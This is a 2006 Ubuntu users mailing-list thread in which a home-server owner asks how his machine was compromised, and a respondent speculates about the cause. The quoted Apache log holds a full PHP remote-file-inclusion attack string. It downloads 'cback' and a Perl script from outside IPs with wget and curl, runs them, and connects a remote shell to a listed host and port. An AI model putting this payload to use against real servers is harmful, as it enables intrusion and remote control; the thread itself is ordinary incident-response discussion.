My home desktop was compromised, but how?
Michael J. Lynch
mlynch at gcom.com
Tue Feb 28 21:31:25 UTC 2006
Carthik Sharma wrote:
> Hi,
>
> I run an apache, ssh server from my home computer. I have not
> installed any php scripts whatsoever. All there are are text files,
> and the odd html file.
>
> Somebody seems to have hacked into my desktop/server. I find files in
> the /tmp/ (like "agent.8213)directory which I cannot open, these are
> setuid-ed -- how do I open these?
>
> In my apache access logs, there are things like
> "http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|"
>
> That above is a valid url, and will take you to a script to deface
> someone's php script etc, I suppose. Now, how did this malicious
> hacker get in my computer?
>
> (The full line is :
> 192.168.0.201 - - [26/Feb/2006:14:56:06 -0500] "GET
> /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://66.98.144.89/cmd.txt?&cmd=cd%20/tmp;wget%20216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;wget%20216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;cd%20/var/tmp;curl%20-o%20cback%20http://216.99.218.183/cback;chmod%20744%20cback;./cback%20217.160.242.90%208081;curl%20-o%20dc.txt%20http://216.99.218.183/dc.txt;chmod%20744%20dc.txt;perl%20dc.txt%20217.160.242.90%208081;echo%20YYY;echo|
> HTTP/1.1" 404 303 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
> 5.1;)" )
> How would I go about tracing how this incident happened?
>
> Any server/security admins here that can help me with a little
> patience? I really want to get to the root of this and find out why
> whatever happened happened.
>
> None of the passwords for the ssh accounts are dictionary words, in
> fact all are combinations of letters, numbers and sometimes special
> symbols.
>
> I have done nothing special to modify apache, or the ssh daemon, in
> fact, sshd listens on port 8888.
>
> I could paste logs here, but they would be too long. For now, I have
> stopped the apache and ssh servers.
>
> Any help will be most welcome. My security bubble just burst :(
>
> Carthik.
>
I'm not sure how you'd go about tracing down what happened, but my guess
is that it came in with a webpage. It clearly looks to be an attempt to
break into your machine as the *dc.txt* file it downloaded is a perl
script that looks to me like it attempts to connect an interactive shell
to a remote server of some sort. I believe this to be malicious because
the script redirects the shell history to /dev/null to hide what was
done.
You mention you are running a web server. One of the IP addresses
embedded in the long string is the address of a name server at a web
development company. Are you using such a service?
I don't know if any of this will help, but I hope so.
--
Michael J. Lynch
What if the hokey pokey IS what it's all about -- author unknown
More information about the ubuntu-users
mailing list